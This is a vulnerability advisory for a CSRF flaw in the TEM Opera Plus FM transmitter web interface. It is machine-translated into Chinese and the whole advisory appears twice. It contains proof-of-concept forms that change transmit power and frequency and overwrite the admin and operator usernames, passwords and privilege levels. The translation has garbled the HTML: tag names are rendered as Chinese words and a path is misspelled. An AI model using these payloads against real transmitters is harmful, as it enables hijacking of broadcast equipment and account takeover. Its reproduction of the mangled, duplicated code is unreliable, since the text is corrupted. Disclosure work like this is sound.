! -
TEM Opera Plus FM家庭发射器35.45 XSRF
Vendor: Telecomunicazioni Elettro Milano(TEM)S.R.L.
产品网页: https://www.tem-titery.it
受影响的版本:软件版本: 35.45
WebServer版本: 1.7
summary:这条新系列Opera Plus FM发射机非常结合
紧凑的高效,高可靠性和低能消耗
解决方案。它们具有可以消除的创新功能和功能
其他设备所需的成本:自动交换音频
来源,内置立体声编码器,集成的RDS编码器,并行I/O
卡,通过GSM遥测和/或TCP IP/SNMP/SMTP的连接性
Web服务器。
DESC:应用程序接口允许用户执行某些操作
通过HTTP请求,无需执行任何有效性检查以验证
请求。这可以利用以行政管理执行某些操作
特权如果登录用户访问恶意网站。
在: Web服务器上进行了测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5800
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5800.php
18.08.2023
- -
CSRF更改向前功率:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
html
身体
表单操作='http://192.168.1.2:8000/user/postcmd.htm'method='post'enctype='text/plain'
输入类型='隐藏'名='pwr'值='00100' /
输入类型='submit'value='change' /
/形式
/身体
/html
CSRF变更频率:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
html
身体
表单操作='http://192.168.1.2:8000/user/postcmd.htm'method='post'enctype='text/plain'
输入类型='隐藏'名称='freq'值='95#46; 5' /
输入类型='submit'value='change' /
/形式
/身体
/html
CSRF更改用户/PASS/PRIV CHAME ADMIN/USER/PASS3360
---------------------------------------------------------------------------
html
身体
表单操作='http://192.168.1.2:8000/protect/counderts.htm'method='post'
输入类型='隐藏'名称='usr0'值='admin' /
输入类型='隐藏'名称='psw0'值='admin' /
输入类型='隐藏'名称='usr1'值='operator1' /
输入类型='隐藏'名='psw1'值='operator1' /
输入类型='隐藏'名称='lev1'值='1' /
输入类型='隐藏'名称='usr2'值='operator2' /
输入type='隐藏'名称='psw2'值='operator2' /
输入类型='隐藏'名称='lev2'值='1' /
输入类型='隐藏'名称='usr3'value='Consulter1' /
输入type='隐藏'名称='psw3'值='Consulter1' /
输入类型='隐藏'名称='lev3'值='2' /
输入类型='隐藏'名称='usr4'value='Consulter2' /
输入type='隐藏'名称='psw4'值='Consulter2' /
输入类型='隐藏'名称='lev4'值='2' /
输入类型='隐藏'名称='usr5'value='Consulter3' /
输入类型='隐藏'名称='psw5'值='Consulter3' /
输入类型='隐藏'名称='lev5'值='2' /
输入类型='submit'value='change' /
/形式
/身体
/html
TEM Opera Plus FM家庭发射器35.45 XSRF
Vendor: Telecomunicazioni Elettro Milano(TEM)S.R.L.
产品网页: https://www.tem-titery.it
受影响的版本:软件版本: 35.45
WebServer版本: 1.7
summary:这条新系列Opera Plus FM发射机非常结合
紧凑的高效,高可靠性和低能消耗
解决方案。它们具有可以消除的创新功能和功能
其他设备所需的成本:自动交换音频
来源,内置立体声编码器,集成的RDS编码器,并行I/O
卡,通过GSM遥测和/或TCP IP/SNMP/SMTP的连接性
Web服务器。
DESC:应用程序接口允许用户执行某些操作
通过HTTP请求,无需执行任何有效性检查以验证
请求。这可以利用以行政管理执行某些操作
特权如果登录用户访问恶意网站。
在: Web服务器上进行了测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5800
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5800.php
18.08.2023
- -
CSRF更改向前功率:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
html
身体
表单操作='http://192.168.1.2:8000/user/postcmd.htm'method='post'enctype='text/plain'
输入类型='隐藏'名='pwr'值='00100' /
输入类型='submit'value='change' /
/形式
/身体
/html
CSRF变更频率:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
html
身体
表单操作='http://192.168.1.2:8000/user/postcmd.htm'method='post'enctype='text/plain'
输入类型='隐藏'名称='freq'值='95#46; 5' /
输入类型='submit'value='change' /
/形式
/身体
/html
CSRF更改用户/PASS/PRIV CHAME ADMIN/USER/PASS3360
---------------------------------------------------------------------------
html
身体
表单操作='http://192.168.1.2:8000/protect/counderts.htm'method='post'
输入类型='隐藏'名称='usr0'值='admin' /
输入类型='隐藏'名称='psw0'值='admin' /
输入类型='隐藏'名称='usr1'值='operator1' /
输入类型='隐藏'名='psw1'值='operator1' /
输入类型='隐藏'名称='lev1'值='1' /
输入类型='隐藏'名称='usr2'值='operator2' /
输入type='隐藏'名称='psw2'值='operator2' /
输入类型='隐藏'名称='lev2'值='1' /
输入类型='隐藏'名称='usr3'value='Consulter1' /
输入type='隐藏'名称='psw3'值='Consulter1' /
输入类型='隐藏'名称='lev3'值='2' /
输入类型='隐藏'名称='usr4'value='Consulter2' /
输入type='隐藏'名称='psw4'值='Consulter2' /
输入类型='隐藏'名称='lev4'值='2' /
输入类型='隐藏'名称='usr5'value='Consulter3' /
输入类型='隐藏'名称='psw5'值='Consulter3' /
输入类型='隐藏'名称='lev5'值='2' /
输入类型='submit'value='change' /
/形式
/身体
/html